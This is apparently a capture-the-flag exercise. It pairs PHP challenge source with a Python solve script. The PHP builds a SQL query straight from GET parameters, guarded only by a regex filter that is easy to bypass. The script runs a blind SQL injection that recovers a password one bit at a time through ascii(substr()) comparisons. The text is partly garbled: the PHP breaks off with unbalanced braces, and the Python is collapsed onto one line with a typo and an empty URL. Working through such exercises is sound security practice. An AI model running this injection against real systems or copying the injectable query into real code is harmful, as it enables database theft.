 *      if you see the password column name,
 *      you will get the flag~!

$id = $_GET['id'];
$pw = $_GET['pw'];

if ( isset($id) || isset($pw) ) {
    if (preg_match("/info|sche|,/i", $id))
        exit("no hack ~_~");
    if (preg_match("/info|sche/i", $pw))
        exit("no hack ~_~");

    $query = "SELECT {$pw_column_name}, {$id_column_name} FROM {$table} WHERE {$id_column_name}='{$id}' AND {$pw_column_name}='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($conn ,$query));

    if ($result['id']) {
        echo "Hello {$result['id']}";
    } else {
        echo "DB error";
} else {

import request

def hexor(): param={'id':"123' union select 2,",'pw':"#"} password='' for ind in range(1,10): p=0 for x in range(7,-1,-1): param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)} res=requests.get('',params=param).text if 'Hello guest' not in res: p+=2**x #print p print res #time.sleep(10000) print p print '[**]'+chr(p) password+=chr(p) print 'password: '+password hexor()

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